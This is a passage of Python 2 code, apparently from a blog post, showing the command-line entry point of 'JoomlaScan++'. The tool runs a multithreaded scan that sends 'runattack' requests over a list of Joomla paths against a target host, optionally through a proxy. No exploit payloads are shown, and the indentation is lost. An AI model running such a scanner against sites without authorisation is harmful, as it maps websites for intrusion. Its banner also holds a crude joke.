print "Error Occurred:",msg
pass
if __name__=="__main__":
import getopt,sys
print "\n\tJoomlaScan++ - Now Not As Ghey!"
print "\t--------------------------------------------"
try:
opts, args = getopt.getopt(sys.argv[1:], "hep:j:", ["help", "output="])
except getopt.GetoptError, err:
usage()
socket.setdefaulttimeout(6)
p404=False
proxy=''
host=''
joomlapath=''
for o, a in opts:
if o == "-v":
verbose = True
elif o in ("-h", "--help"):
usage()
elif o in ("-p", "--proxy"):
proxy=a
elif o in ("-e","--errors"):
p404=True
elif o in ("-j","--joomlapath"):
joomlapath=a
else:
usage()
if args:
host=args[0]
else:
usage()
if proxy:
testproxy(proxy)
testhost(host)
attackpool=ThreadPool(20)
for item in paths.items():
attackpool.putRequest(WorkRequest(runattack,item))
print "Main thread working..."
while 1:
try:
attackpool.poll()
time.sleep(0.5)
except (KeyboardInterrupt):
print "User Break... Exiting..."
break
except (NoResultsPending):
print "Scan Finished: Exiting."
break
Subscribe to:
Posts (Atom)